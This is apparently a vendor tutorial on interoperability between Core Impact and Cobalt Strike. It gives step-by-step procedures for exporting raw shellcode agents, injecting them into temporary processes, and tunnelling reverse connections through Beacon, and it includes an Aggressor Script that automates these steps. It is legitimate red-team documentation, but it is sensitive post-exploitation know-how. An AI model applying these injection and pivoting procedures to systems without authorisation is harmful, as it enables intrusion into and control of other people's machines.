Core Impact and Cobalt Strike Interoperability
Introduction
Contrary to many perceptions, Cobalt Strike is actually not a penetration testing tool. As we mentioned earlier, we identify as a tool for post-exploitation adversary simulations and Red Team operations. However, we have recently begun offering interoperability with Core Impact, which is a penetration testing tool with features that align well with those of Cobalt Strike.
Core Impact is typically used for exploitation and lateral movement and validating the attack paths often associated with a penetration test. Used by both in-house teams as well as third-party services, Core Impact offers capabilities for remote, local, and client-side exploitation. Impact also uses post-exploitation agents, which, while they don’t have a cool name like “Beacon,” are versatile in both their deployment and capabilities, including chaining and pivoting.
While a previous blog dives deeper into the particulars, to quickly summarize, the interoperability piece comes in the form of session passing between both platforms. Those with both tools can deploy Beacon from within Core Impact. Additionally, users can spawn an Impact agent from within Cobalt Strike.
References
- Core Impact & Cobalt Strike Datasheet
- Agent Deployed: Core Impact and Cobalt Strike Interoperability
- How to Extend Your Reach with Cobalt Strike
Session Passing from Core Impact to Cobalt Strike
One of the most important forms of tool interoperability is the ability to pass sessions between platforms.
Core Impact includes a Run shellcode in temporary process module to support session passing. This module spawns a temporary process and injects the contents of the specified file into it. The module supports spawning code x86 -> x86, x64 -> x64, and x64 -> x86; there is no x86 -> x64 path, so an x86 source agent must be given an x86 payload.
To pass a session from Core Impact to Cobalt Strike:
Cobalt Strike
- Go to Payloads -> Windows Stageless Payload
- Click … to choose your listener
- Change Output to raw
- Check x64 if you wish to export an x64 payload
- Click Generate and save the file
Core Impact
- Right-click on the desired agent and click Set as Source
- Find the Run shellcode in temporary process module and double-click it
- Set ARCHITECTURE to x86-64 if you exported an x64 payload
- Set FILENAME to the file generated by Cobalt Strike
- Click OK
- After some seconds, you should see a new Beacon deployed in Cobalt Strike
This pattern is a great way to spawn Cobalt Strike’s Beacon after a successful remote or privilege escalation exploit with Core Impact.
Session Passing from Cobalt Strike to Core Impact
You can also spawn a Core Impact agent from Cobalt Strike. In this pattern the Impact agent connects back to Core Impact on its own, so it works when the target can reach the Core Impact host directly. Where that holds, it is a lightweight way to turn access obtained with Beacon (e.g., via phishing or lateral movement) into an Impact agent; where it does not, use the spunnel tunnel described in the next section instead.
Core Impact
- Find the Package and Register Agent module and double-click it
- Change ARCHITECTURE to x86-64 if you'd like to export an x64 agent
- Change BINARY TYPE to raw
- Change TARGET FILE to where you would like to save the file
- Expand Agent Connection
- Change CONNECTION METHOD and PORT to fit your preference. I find that Connect from target (reverse TCP connection) is the most performant.
Cobalt Strike
- Interact with a Beacon
- Type shspawn x64 if you exported an x64 agent, or shspawn x86 if you exported an x86 agent
- Find the <file generated by Core Impact> that you exported
- Click Open
- After some seconds, you should hear the famous New Agent Deployed 🔊 announcement within Core Impact.
Tunnel Core Impact exploits through Cobalt Strike
Core Impact has an interesting offensive model. Its exploits and scans do not originate from your Core Impact GUI. The entire framework is architected to delegate offense activity through a source agent. The currently selected source agent also acts as a controller to receive connections from reverse agents [or to connect to and establish control of bind agents]. In this model, the offense process is: start with local agent, find and exploit target, set new agent as source agent, find and exploit newly visible targets, repeat until satisfied.
As the agent is the main offense actor in Core Impact, tunneling Core Impact exploits is best accomplished by tunneling the Core Impact agent through Cobalt Strike’s Beacon.
Cobalt Strike introduced the spunnel command to spawn Core Impact's Windows agent in a temporary process and create a localhost-only reverse port forward for it: the agent connects to 127.0.0.1 on the target, Beacon relays that connection to the team server, and the team server connects to the Core Impact host and port you name on the command line. Nothing on the target needs to reach Core Impact directly. Here are the steps to tunnel Core Impact's agent with spunnel:
Core Impact
- Click the Modules tab in the Core Impact user interface
- Search for Package and Register Agent
- Double-click this module
- Change Platform to Windows
- Change Architecture to x86-64
- Change Binary Type to raw
- Click Target File and press … to decide where to save the output
- Go to Agent Connection
- Change Connection Method to Connect from Target
- Change Connect Back Hostname to 127.0.0.1
- Change Port to 9000 (or any arbitrary value) and remember it
- Press OK
Cobalt Strike
- Right-click on the asset and press Interact with a Beacon
- Type spunnel x64 [impact IP address] 9000 and press enter, where [impact IP address] is the Core Impact host as reachable from the team server and 9000 is the port you set in the module
- Find the file generated by Core Impact that you exported
- Press Open
- After some seconds, you should hear the famous New Agent Deployed 🔊 announcement within Core Impact.
This is similar to passing a session from Cobalt Strike to Core Impact. The difference here is that the Impact agent's traffic is tunneled through Cobalt Strike's Beacon payload rather than sent from the target to Core Impact directly.
What happens when Cobalt Strike’s team server is on the internet and Core Impact is on a local Windows virtual machine? We have a pattern for this too.
- Run a Cobalt Strike client from the same Windows system that Core Impact is installed on.
- Connect this Cobalt Strike client to your team server.
- In this setup, run spunnel_local x64 127.0.0.1 9000 to spawn and tunnel the Impact agent through Beacon.
The spunnel_local command is like spunnel, with the difference that it routes the agent traffic from Beacon to the team server and onwards through your Cobalt Strike client, so the host and port you give (here 127.0.0.1 and 9000) are resolved on the machine running the client, which is where Core Impact is listening. The spunnel_local command was designed for this exact situation.
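The Beacon commands used in the last two sections (shspawn, spunnel and spunnel_local) are also exposed to Aggressor Script, so the export-then-type procedure can be wrapped in aliases that pick the agent file for you. The script below is an added example, not code from the Cobalt Strike or Core Impact documentation. It assumes the Aggressor functions bshspawn, bspunnel and bspunnel_local take their arguments in the order shown (beacon id, architecture, then host and port for the tunnel variants, then the raw agent file) as in the Aggressor Script reference; the paths in %impact_agents and the alias names are placeholders you choose. It selects the agent architecture from the Beacon's own (barch), which is a convenient default rather than a requirement, and it refuses to inject a file that begins with an MZ header, which is what you get if Binary Type was left on an executable type instead of raw.

```sleep
# Added example (not code from the Cobalt Strike or Core Impact docs).
# Aggressor Script aliases wrapping shspawn / spunnel / spunnel_local for
# passing a session to Core Impact. Assumptions: argument order of
# bshspawn($bid, $arch, $file), bspunnel($bid, $arch, $host, $port, $file)
# and bspunnel_local(...) as in the Aggressor Script reference; the file
# paths below are placeholders for the raw output of "Package and Register Agent".

# One raw agent per architecture, exported from Core Impact (placeholder paths).
%impact_agents["x86"] = "C:/impact/agent_x86.bin";
%impact_agents["x64"] = "C:/impact/agent_x64.bin";

# Return the raw agent file matching this Beacon's architecture, or $null
# (after printing the reason to the Beacon console) if it cannot be used.
sub impact_agent_for {
    local('$bid $arch $file $handle $head');
    $bid  = $1;
    $arch = binfo($bid, "barch");          # "x86" or "x64"
    $file = %impact_agents[$arch];

    if (!-exists $file) {
        berror($bid, "no raw $arch Core Impact agent at $file");
        return $null;
    }

    # Binary Type "raw" yields position-independent code. An "MZ" header means
    # an executable was exported instead; injecting it would crash the
    # temporary process, so stop here.
    $handle = openf($file);
    $head   = readb($handle, 2);
    closef($handle);
    if ($head eq "MZ") {
        berror($bid, "$file is a PE file; re-export with Binary Type set to raw");
        return $null;
    }

    blog($bid, "using $arch Core Impact agent $file");
    return $file;
}

# impact_spawn
# Direct session pass (the shspawn section): the agent connects back to
# Core Impact by itself, so the target must be able to reach the Impact host.
alias impact_spawn {
    local('$file');
    $file = impact_agent_for($1);
    if ($file !is $null) {
        bshspawn($1, binfo($1, "barch"), $file);
    }
}

# impact_tunnel [impact host] [port]
# Tunnelled pass (the spunnel section): the agent connects to 127.0.0.1:[port]
# on the target and Beacon carries the connection to Core Impact via the team server.
alias impact_tunnel {
    local('$file');
    if ($2 is $null || $3 is $null) {
        berror($1, "usage: impact_tunnel [impact host] [port]");
        return;
    }
    $file = impact_agent_for($1);
    if ($file !is $null) {
        bspunnel($1, binfo($1, "barch"), $2, $3, $file);
    }
}

# impact_tunnel_local [port]
# Same as above, but the tunnel ends at this Cobalt Strike client: for a team
# server on the internet and Core Impact on the machine running the client.
alias impact_tunnel_local {
    local('$file');
    if ($2 is $null) {
        berror($1, "usage: impact_tunnel_local [port]");
        return;
    }
    $file = impact_agent_for($1);
    if ($file !is $null) {
        bspunnel_local($1, binfo($1, "barch"), "127.0.0.1", $2, $file);
    }
}
```

Load the script through Cobalt Strike -> Script Manager, then from a Beacon console type impact_spawn, impact_tunnel 10.0.0.5 9000 or impact_tunnel_local 9000 (10.0.0.5 is a placeholder for the Core Impact host). The agent must have been exported with Connect Back Hostname 127.0.0.1 for the two tunnel aliases, exactly as in the manual steps above; the aliases do not change how the agent was packaged, only how the shellcode is launched.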
Explore on Your Own
At this point, you have explored some of Cobalt Strike's features. Feel free to explore and test other commands and features.